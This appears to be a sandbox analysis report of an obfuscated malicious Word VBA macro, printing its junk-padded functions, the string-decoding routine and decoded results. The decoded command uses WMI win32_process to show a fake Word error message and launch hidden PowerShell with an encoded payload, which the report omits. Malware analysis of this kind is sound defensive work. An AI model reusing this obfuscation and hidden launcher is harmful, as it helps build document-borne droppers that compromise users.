                                                                    Const wPuUI as String = "A"

                                                                    17

                                                                    Const QNBiBDJF as String = ","

                                                                    18

                                                                    Const TfZstIBWb as String = "*high*,*critic*"

                                                                    19

                                                                    Dim GyemVIEQ as Range

                                                                    19

                                                                    Set GyemVIEQ = Array((wPuUI), Target)

                                                                    Array

                                                                    wPuUI

                                                                    Target

                                                                    20

                                                                    If GyemVIEQ Is Nothing Then

                                                                    21

                                                                    Endif

                                                                    22

                                                                    Dim kTIuCnPI() as String

                                                                    22

                                                                    kTIuCnPI = Split(TfZstIBWb, QNBiBDJF)

                                                                    Split

                                                                    TfZstIBWb

                                                                    QNBiBDJF

                                                                    22

                                                                    uUNTnPDJ:

                                                                    24

                                                                    mjbBYHhbs = "ns wu db " + "ndpns wu db nd"

                                                                    25

                                                                    I8bgyvyef5pdaj7_v = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"

                                                                    26

                                                                    Goto dtPsGEOG

                                                                    27

                                                                    Const mQUInscCB as String = "A"

                                                                    28

                                                                    Const PmHbFtBA as String = ","

                                                                    29

                                                                    Const NxyDdD as String = "*high*,*critic*"

                                                                    30

                                                                    Dim ENgVDEnDI as Range

                                                                    30

                                                                    Set ENgVDEnDI = Array((mQUInscCB), Target)

                                                                    Array

                                                                    mQUInscCB

                                                                    Target

                                                                    31

                                                                    If ENgVDEnDI Is Nothing Then

                                                                    32

                                                                    Endif

                                                                    33

                                                                    Dim TmgVHr() as String

                                                                    33

                                                                    TmgVHr = Split(NxyDdD, PmHbFtBA)

                                                                    Split

                                                                    NxyDdD

                                                                    PmHbFtBA

                                                                    33

                                                                    dtPsGEOG:

                                                                    35

                                                                    A3hie1o1mwdgk_9_ = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"

                                                                    36

                                                                    Goto bwTdFGH

                                                                    37

                                                                    Const ZcbWFy as String = "A"

                                                                    38

                                                                    Const jmprxcAGG as String = ","

                                                                    39

                                                                    Const uwcdCFcFJ as String = "*high*,*critic*"

                                                                    40

                                                                    Dim GhFhH as Range

                                                                    40

                                                                    Set GhFhH = Array((ZcbWFy), Target)

                                                                    Array

                                                                    ZcbWFy

                                                                    Target

                                                                    41

                                                                    If GhFhH Is Nothing Then

                                                                    42

                                                                    Endif

                                                                    43

                                                                    Dim auKzIlBI() as String

                                                                    43

                                                                    auKzIlBI = Split(uwcdCFcFJ, jmprxcAGG)

                                                                    Split

                                                                    uwcdCFcFJ

                                                                    jmprxcAGG

                                                                    43

                                                                    bwTdFGH:

                                                                    45

                                                                    Bn1mqobqcygrsk1zn = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"

                                                                    46

                                                                    Goto FCnAjUBF

                                                                    47

                                                                    Const upIoDlhH as String = "A"

                                                                    48

                                                                    Const BZLGJ as String = ","

                                                                    49

                                                                    Const DpdIEHHc as String = "*high*,*critic*"

                                                                    50

                                                                    Dim yifdCzUX as Range

                                                                    50

                                                                    Set yifdCzUX = Array((upIoDlhH), Target)

                                                                    Array

                                                                    upIoDlhH

                                                                    Target

                                                                    51

                                                                    If yifdCzUX Is Nothing Then

                                                                    52

                                                                    Endif

                                                                    53

                                                                    Dim vmuBOT() as String

                                                                    53

                                                                    vmuBOT = Split(DpdIEHHc, BZLGJ)

                                                                    Split

                                                                    DpdIEHHc

                                                                    BZLGJ

                                                                    53

                                                                    FCnAjUBF:

                                                                    55

                                                                    Acbncig4c2s9p = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"

                                                                    Mid

                                                                    Name

                                                                    Application

                                                                    56

                                                                    Goto dmJpUJBT

                                                                    57

                                                                    Const LFmsHlGJO as String = "A"

                                                                    58

                                                                    Const VlJBAxsF as String = ","

                                                                    59

                                                                    Const DReLBGD as String = "*high*,*critic*"

                                                                    60

                                                                    Dim IUtVX as Range

                                                                    60

                                                                    Set IUtVX = Array((LFmsHlGJO), Target)

                                                                    Array

                                                                    LFmsHlGJO

                                                                    Target

                                                                    61

                                                                    If IUtVX Is Nothing Then

                                                                    62

                                                                    Endif

                                                                    63

                                                                    Dim LgSUu() as String

                                                                    63

                                                                    LgSUu = Split(DReLBGD, VlJBAxsF)

                                                                    Split

                                                                    DReLBGD

                                                                    VlJBAxsF

                                                                    63

                                                                    dmJpUJBT:

                                                                    65

                                                                    C4s8ozri2fdnbsu4 = Bn1mqobqcygrsk1zn + Acbncig4c2s9p + A3hie1o1mwdgk_9_ + mjbBYHhbs + I8bgyvyef5pdaj7_v

                                                                    66

                                                                    Goto cskzymBH

                                                                    67

                                                                    Const QttEc as String = "A"

                                                                    68

                                                                    Const sInuFuLII as String = ","

                                                                    69

                                                                    Const ybkwIF as String = "*high*,*critic*"

                                                                    70

                                                                    Dim YYiqHCrBJ as Range

                                                                    70

                                                                    Set YYiqHCrBJ = Array((QttEc), Target)

                                                                    Array

                                                                    QttEc

                                                                    Target

                                                                    71

                                                                    If YYiqHCrBJ Is Nothing Then

                                                                    72

                                                                    Endif

                                                                    73

                                                                    Dim jEGWECK() as String

                                                                    73

                                                                    jEGWECK = Split(ybkwIF, sInuFuLII)

                                                                    Split

                                                                    ybkwIF

                                                                    sInuFuLII

                                                                    73

                                                                    cskzymBH:

                                                                    75

                                                                    Eqhw188dzwgnq = Zr9iedzfw6nr(C4s8ozri2fdnbsu4)

                                                                    76

                                                                    Goto GKCGI

                                                                    77

                                                                    Const JNPIBwzJy as String = "A"

                                                                    78

                                                                    Const xJhvfW as String = ","

                                                                    79

                                                                    Const MtSXGFAwF as String = "*high*,*critic*"

                                                                    80

                                                                    Dim CtnVB as Range

                                                                    80

                                                                    Set CtnVB = Array((JNPIBwzJy), Target)

                                                                    Array

                                                                    JNPIBwzJy

                                                                    Target

                                                                    81

                                                                    If CtnVB Is Nothing Then

                                                                    82

                                                                    Endif

                                                                    83

                                                                    Dim QFCSIz() as String

                                                                    83

                                                                    QFCSIz = Split(MtSXGFAwF, xJhvfW)

                                                                    Split

                                                                    MtSXGFAwF

                                                                    xJhvfW

                                                                    83

                                                                    GKCGI:

                                                                    85

                                                                    Set Ixvxtuve66zxo = VBA.GetObject(Eqhw188dzwgnq)

                                                                    GetObject("winmgmts:win32_process")

                                                                    executed
                                                                    86

                                                                    Goto OQtflfHc

                                                                    87

                                                                    Const vXvXQH as String = "A"

                                                                    88

                                                                    Const BBnudDV as String = ","

                                                                    89

                                                                    Const AnoeDGEY as String = "*high*,*critic*"

                                                                    90

                                                                    Dim nUxeKfi as Range

                                                                    90

                                                                    Set nUxeKfi = Array((vXvXQH), Target)

                                                                    Array

                                                                    vXvXQH

                                                                    Target

                                                                    91

                                                                    If nUxeKfi Is Nothing Then

                                                                    92

                                                                    Endif

                                                                    93

                                                                    Dim LJgRGnI() as String

                                                                    93

                                                                    LJgRGnI = Split(AnoeDGEY, BBnudDV)

                                                                    Split

                                                                    AnoeDGEY

                                                                    BBnudDV

                                                                    93

                                                                    OQtflfHc:

                                                                    95

                                                                    mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))

                                                                    Mid

                                                                    Len([obfuscated string omitted]) -> 37616

                                                                    executed
                                                                    96

                                                                    pqwm = Zr9iedzfw6nr(mxkikw)

                                                                    97

                                                                    Goto zImEIFI

                                                                    98

                                                                    Const TYMfJE as String = "A"

                                                                    99

                                                                    Const ppqanE as String = ","

                                                                    100

                                                                    Const zzXfBb as String = "*high*,*critic*"

                                                                    101

                                                                    Dim YXgZLBuTI as Range

                                                                    101

                                                                    Set YXgZLBuTI = Array((TYMfJE), Target)

                                                                    Array

                                                                    TYMfJE

                                                                    Target

                                                                    102

                                                                    If YXgZLBuTI Is Nothing Then

                                                                    103

                                                                    Endif

                                                                    104

                                                                    Dim qJJnPFoNQ() as String

                                                                    104

                                                                    qJJnPFoNQ = Split(zzXfBb, ppqanE)

                                                                    Split

                                                                    zzXfBb

                                                                    ppqanE

                                                                    104

                                                                    zImEIFI:

                                                                    106

                                                                    Ixvxtuve66zxo.Create pqwm, S2xsub800b7, Tl85j6j2gy2n7qad

                                                                    SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc [encoded payload omitted],,) -> 0

                                                                    S2xsub800b7

                                                                    Tl85j6j2gy2n7qad

                                                                    executed
                                                                    107

                                                                    Goto LcJWChpF

                                                                    108

                                                                    Const uFHXMGsDH as String = "A"

                                                                    109

                                                                    Const wbcoCJA as String = ","

                                                                    110

                                                                    Const UupSwG as String = "*high*,*critic*"

                                                                    111

                                                                    Dim IfvyDH as Range

                                                                    111

                                                                    Set IfvyDH = Array((uFHXMGsDH), Target)

                                                                    Array

                                                                    uFHXMGsDH

                                                                    Target

                                                                    112

                                                                    If IfvyDH Is Nothing Then

                                                                    113

                                                                    Endif

                                                                    114

                                                                    Dim HfUXFJwF() as String

                                                                    114

                                                                    HfUXFJwF = Split(UupSwG, wbcoCJA)

                                                                    Split

                                                                    UupSwG

                                                                    wbcoCJA

                                                                    114

                                                                    LcJWChpF:

                                                                    116

                                                                    End Function

                                                                    APIs    Meta Information

                                                                    Array

                                                                    OtpOArK

                                                                    Target

                                                                    Split

                                                                    iJkmJG

                                                                    mbLvUI

                                                                    Array

                                                                    vQbVHTJ

                                                                    Target

                                                                    Split

                                                                    mbdQXnNAJ

                                                                    SRadpEcF

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: UrnhFG

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: LYEtDJDB

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: AeZXCL

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: bTSPCh

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: XfKDE

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: eJIkEagfC

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: rlKxF

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: VVDiBADws

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: TziQbRH

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Replace

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: He0e1df114_gsl7i

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: rwAdJC

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: buaHCHyIN

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: HzpNhFB

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: SdueDATuJ

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: TQutDNlhF

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: wAZjcaDbE

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: SOBiDVBG

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: LXmiCH

                                                                    Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: uQDVbE

                                                                    Array

                                                                    gPxXF

                                                                    Target

                                                                    Split

                                                                    IcBqyoTE

                                                                    vMqQFsCmr

                                                                    Array

                                                                    huzCVaAnM

                                                                    Target

                                                                    Split

                                                                    AEpDpJGH

                                                                    nmoAspl

                                                                    Strings    Decrypted Strings
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    Line    Instruction    Meta Information
                                                                    117

                                                                    Function Zr9iedzfw6nr(Pdkbu8b4a_ucmmy2)

                                                                    118

                                                                    On Error Resume Next

                                                                    executed
                                                                    119

                                                                    Goto XDCYoHErU

                                                                    120

                                                                    Const OtpOArK as String = "A"

                                                                    121

                                                                    Const mbLvUI as String = ","

                                                                    122

                                                                    Const iJkmJG as String = "*high*,*critic*"

                                                                    123

                                                                    Dim uHhldyVW as Range

                                                                    123

                                                                    Set uHhldyVW = Array((OtpOArK), Target)

                                                                    Array

                                                                    OtpOArK

                                                                    Target

                                                                    124

                                                                    If uHhldyVW Is Nothing Then

                                                                    125

                                                                    Endif

                                                                    126

                                                                    Dim OAFQFBEFa() as String

                                                                    126

                                                                    OAFQFBEFa = Split(iJkmJG, mbLvUI)

                                                                    Split

                                                                    iJkmJG

                                                                    mbLvUI

                                                                    126

                                                                    XDCYoHErU:

                                                                    128

                                                                    N21io7rxzal10t = Pdkbu8b4a_ucmmy2

                                                                    129

                                                                    Goto PDgjIDCIF

                                                                    130

                                                                    Const vQbVHTJ as String = "A"

                                                                    131

                                                                    Const SRadpEcF as String = ","

                                                                    132

                                                                    Const mbdQXnNAJ as String = "*high*,*critic*"

                                                                    133

                                                                    Dim ZhuxR as Range

                                                                    133

                                                                    Set ZhuxR = Array((vQbVHTJ), Target)

                                                                    Array

                                                                    vQbVHTJ

                                                                    Target

                                                                    134

                                                                    If ZhuxR Is Nothing Then

                                                                    135

                                                                    Endif

                                                                    136

                                                                    Dim xcFaA() as String

                                                                    136

                                                                    xcFaA = Split(mbdQXnNAJ, SRadpEcF)

                                                                    Split

                                                                    mbdQXnNAJ

                                                                    SRadpEcF

                                                                    136

                                                                    PDgjIDCIF:

                                                                    138

                                                                    L4jc0swehya = Sotm_c8dqxel(N21io7rxzal10t)

                                                                    139

                                                                    Goto zPYsAGBC

                                                                    140

                                                                    Const gPxXF as String = "A"

                                                                    141

                                                                    Const vMqQFsCmr as String = ","

                                                                    142

                                                                    Const IcBqyoTE as String = "*high*,*critic*"

                                                                    143

                                                                    Dim UTUqCwyI as Range

                                                                    143

                                                                    Set UTUqCwyI = Array((gPxXF), Target)

                                                                    Array

                                                                    gPxXF

                                                                    Target

                                                                    144

                                                                    If UTUqCwyI Is Nothing Then

                                                                    145

                                                                    Endif

                                                                    146

                                                                    Dim MNzdmO() as String

                                                                    146

                                                                    MNzdmO = Split(IcBqyoTE, vMqQFsCmr)

                                                                    Split

                                                                    IcBqyoTE

                                                                    vMqQFsCmr

                                                                    146

                                                                    zPYsAGBC:

                                                                    148

                                                                    Zr9iedzfw6nr = L4jc0swehya

                                                                    149

                                                                    Goto mFRDA

                                                                    150

                                                                    Const huzCVaAnM as String = "A"

                                                                    151

                                                                    Const nmoAspl as String = ","

                                                                    152

                                                                    Const AEpDpJGH as String = "*high*,*critic*"

                                                                    153

                                                                    Dim EZSQT as Range

                                                                    153

                                                                    Set EZSQT = Array((huzCVaAnM), Target)

                                                                    Array

                                                                    huzCVaAnM

                                                                    Target

                                                                    154

                                                                    If EZSQT Is Nothing Then

                                                                    155

                                                                    Endif

                                                                    156

                                                                    Dim aEMwHJJ() as String

                                                                    156

                                                                    aEMwHJJ = Split(AEpDpJGH, nmoAspl)

                                                                    Split

                                                                    AEpDpJGH

                                                                    nmoAspl

                                                                    156

                                                                    mFRDA:

                                                                    158

                                                                    End Function

                                                                    APIs    Meta Information

                                                                    Array

                                                                    UrnhFG

                                                                    Target

                                                                    Split

                                                                    LYEtDJDB

                                                                    AeZXCL

                                                                    Array

                                                                    bTSPCh

                                                                    Target

                                                                    Split

                                                                    XfKDE

                                                                    eJIkEagfC

                                                                    Array

                                                                    rlKxF

                                                                    Target

                                                                    Split

                                                                    VVDiBADws

                                                                    TziQbRH

                                                                    Replace

                                                                    Replace("wns wu db ndinns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db ndns wu db ndns wu db ndsns wu db ndns wu db ndns wu db nd:wns wu db ndns wu db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db ndns wu db ndpns wu db ndns wu db ndrons wu db ndns wu db ndcens wu db ndsns wu db ndsns wu db ndns wu db nd","ns wu db nd",) -> winmgmts:win32_process
ndIAns wu db ndA7ns wu db ndACns wu db ndAAns wu db ndcwns wu db ndBFns wu db ndAHns wu db ndQAns wu db ndLQns wu db ndBJns wu db ndAHns wu db ndQAns wu db ndRQns wu db ndBNns wu db ndACns wu db ndAAns wu db ndVgns wu db ndBhns wu db ndAFns wu db ndIAns wu db ndaQns wu db ndBBns wu db ndAEns wu db ndIAns wu db ndTAns wu db ndBlns wu db ndADns wu db ndoAns wu db ndUwns wu db ndBnns wu db ndADns wu db ndIAns wu db ndeAns wu db ndBVns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu db n,"ns wu db nd",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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

                                                                    He0e1df114_gsl7i

                                                                    Array

                                                                    rwAdJC

                                                                    Target

                                                                    Split

                                                                    buaHCHyIN

                                                                    HzpNhFB

                                                                    Array

                                                                    SdueDATuJ

                                                                    Target

                                                                    Split

                                                                    TQutDNlhF

                                                                    wAZjcaDbE

                                                                    Array

                                                                    SOBiDVBG

                                                                    Target

                                                                    Split

                                                                    LXmiCH

                                                                    uQDVbE

                                                                    Strings | Decrypted Strings
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "ns w""u db nd"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    "A"
                                                                    ","
                                                                    "*high*,*critic*"
                                                                    Line | Instruction | Meta Information
                                                                    159

                                                                    Function Sotm_c8dqxel(Tw8vu7dybjhd)

                                                                    160

                                                                    Goto eRlxboGG

                                                                    executed
                                                                    161

                                                                    Const UrnhFG as String = "A"

                                                                    162

                                                                    Const AeZXCL as String = ","

                                                                    163

                                                                    Const LYEtDJDB as String = "*high*,*critic*"

                                                                    164

                                                                    Dim MvCNCxeRC as Range

                                                                    164

                                                                    Set MvCNCxeRC = Array((UrnhFG), Target)

                                                                    Array

                                                                    UrnhFG

                                                                    Target

                                                                    165

                                                                    If MvCNCxeRC Is Nothing Then

                                                                    166

                                                                    Endif

                                                                    167

                                                                    Dim jqLUKf() as String

                                                                    167

                                                                    jqLUKf = Split(LYEtDJDB, AeZXCL)

                                                                    Split

                                                                    LYEtDJDB

                                                                    AeZXCL

                                                                    167

                                                                    eRlxboGG:

                                                                    169

                                                                    Goto DJesE

                                                                    170

                                                                    Const bTSPCh as String = "A"

                                                                    171

                                                                    Const eJIkEagfC as String = ","

                                                                    172

                                                                    Const XfKDE as String = "*high*,*critic*"

                                                                    173

                                                                    Dim eFfcEAI as Range

                                                                    173

                                                                    Set eFfcEAI = Array((bTSPCh), Target)

                                                                    Array

                                                                    bTSPCh

                                                                    Target

                                                                    174

                                                                    If eFfcEAI Is Nothing Then

                                                                    175

                                                                    Endif

                                                                    176

                                                                    Dim jKGrEhAE() as String

                                                                    176

                                                                    jKGrEhAE = Split(XfKDE, eJIkEagfC)

                                                                    Split

                                                                    XfKDE

                                                                    eJIkEagfC

                                                                    176

                                                                    DJesE:

                                                                    178

                                                                    Goto xdoxB

                                                                    179

                                                                    Const rlKxF as String = "A"

                                                                    180

                                                                    Const TziQbRH as String = ","

                                                                    181

                                                                    Const VVDiBADws as String = "*high*,*critic*"

                                                                    182

                                                                    Dim nQutDRr as Range

                                                                    182

                                                                    Set nQutDRr = Array((rlKxF), Target)

                                                                    Array

                                                                    rlKxF

                                                                    Target

                                                                    183

                                                                    If nQutDRr Is Nothing Then

                                                                    184

                                                                    Endif

                                                                    185

                                                                    Dim rQMlbCDj() as String

                                                                    185

                                                                    rQMlbCDj = Split(VVDiBADws, TziQbRH)

                                                                    Split

                                                                    VVDiBADws

                                                                    TziQbRH

                                                                    185

                                                                    xdoxB:

                                                                    187

                                                                    Sotm_c8dqxel = Replace(Tw8vu7dybjhd, "ns w" + "u db nd", He0e1df114_gsl7i)

                                                                    Replace("wns wu db ndinns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db ndns wu db ndns wu db ndsns wu db ndns wu db ndns wu db nd:wns wu db ndns wu db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db ndns wu db ndpns wu db ndns wu db ndrons wu db ndns wu db ndcens wu db ndsns wu db ndsns wu db ndns wu db nd","ns wu db nd",) -> winmgmts:win32_process

                                                                    He0e1df114_gsl7i

                                                                    executed
                                                                    188

                                                                    Goto VZXgAzj

                                                                    189

                                                                    Const rwAdJC as String = "A"

                                                                    190

                                                                    Const HzpNhFB as String = ","

                                                                    191

                                                                    Const buaHCHyIN as String = "*high*,*critic*"

                                                                    192

                                                                    Dim KJKIF as Range

                                                                    192

                                                                    Set KJKIF = Array((rwAdJC), Target)

                                                                    Array

                                                                    rwAdJC

                                                                    Target

                                                                    193

                                                                    If KJKIF Is Nothing Then

                                                                    194

                                                                    Endif

                                                                    195

                                                                    Dim xMeNBMA() as String

                                                                    195

                                                                    xMeNBMA = Split(buaHCHyIN, HzpNhFB)

                                                                    Split

                                                                    buaHCHyIN

                                                                    HzpNhFB

                                                                    195

                                                                    VZXgAzj:

                                                                    197

                                                                    Goto XxDunFI

                                                                    198

                                                                    Const SdueDATuJ as String = "A"

                                                                    199

                                                                    Const wAZjcaDbE as String = ","

                                                                    200

                                                                    Const TQutDNlhF as String = "*high*,*critic*"

                                                                    201

                                                                    Dim ZtlVi as Range

                                                                    201

                                                                    Set ZtlVi = Array((SdueDATuJ), Target)

                                                                    Array

                                                                    SdueDATuJ

                                                                    Target

                                                                    202

                                                                    If ZtlVi Is Nothing Then

                                                                    203

                                                                    Endif

                                                                    204

                                                                    Dim yVlwI() as String

                                                                    204

                                                                    yVlwI = Split(TQutDNlhF, wAZjcaDbE)

                                                                    Split

                                                                    TQutDNlhF

                                                                    wAZjcaDbE

                                                                    204

                                                                    XxDunFI:

                                                                    206

                                                                    Goto cCNkM

                                                                    207

                                                                    Const SOBiDVBG as String = "A"

                                                                    208

                                                                    Const uQDVbE as String = ","

                                                                    209

                                                                    Const LXmiCH as String = "*high*,*critic*"

                                                                    210

                                                                    Dim zgEErH as Range

                                                                    210

                                                                    Set zgEErH = Array((SOBiDVBG), Target)

                                                                    Array

                                                                    SOBiDVBG

                                                                    Target

                                                                    211

                                                                    If zgEErH Is Nothing Then

                                                                    212

                                                                    Endif

                                                                    213

                                                                    Dim KDRcGw() as String

                                                                    213

                                                                    KDRcGw = Split(LXmiCH, uQDVbE)

                                                                    Split

                                                                    LXmiCH

                                                                    uQDVbE

                                                                    213

                                                                    cCNkM:

                                                                    215

                                                                    End Function

                                                                    Module: Ht_h_pv5qq7taeoe3a

                                                                    Declaration
                                                                    Line | Content
                                                                    1

                                                                    Attribute VB_Name = "Ht_h_pv5qq7taeoe3a"

                                                                    Module: U765y5vgf_ao0faq

                                                                    Declaration
                                                                    Line | Content
                                                                    1

                                                                    Attribute VB_Name = "U765y5vgf_ao0faq"

                                                                    2

                                                                    Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"

                                                                    3

                                                                    Attribute VB_GlobalNameSpace = False

                                                                    4

                                                                    Attribute VB_Creatable = False

                                                                    5

                                                                    Attribute VB_PredeclaredId = True

                                                                    6

                                                                    Attribute VB_Exposed = True

                                                                    7

                                                                    Attribute VB_TemplateDerived = False

                                                                    8

                                                                    Attribute VB_Customizable = True

                                                                    Executed Functions
                                                                    APIs | Meta Information

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: AjzpdH

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: yqmFHJvF

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: jbkkjHHCd

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Nkemmqfhxex

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Content

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Dt5ebejo9lypr_3vmp

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: wPuUI

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: TfZstIBWb

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: QNBiBDJF

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: mQUInscCB

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: NxyDdD

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: PmHbFtBA

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: ZcbWFy

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: uwcdCFcFJ

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: jmprxcAGG

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: upIoDlhH

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: DpdIEHHc

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: BZLGJ

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Mid

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Name

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Application

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: LFmsHlGJO

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: DReLBGD

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: VlJBAxsF

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: QttEc

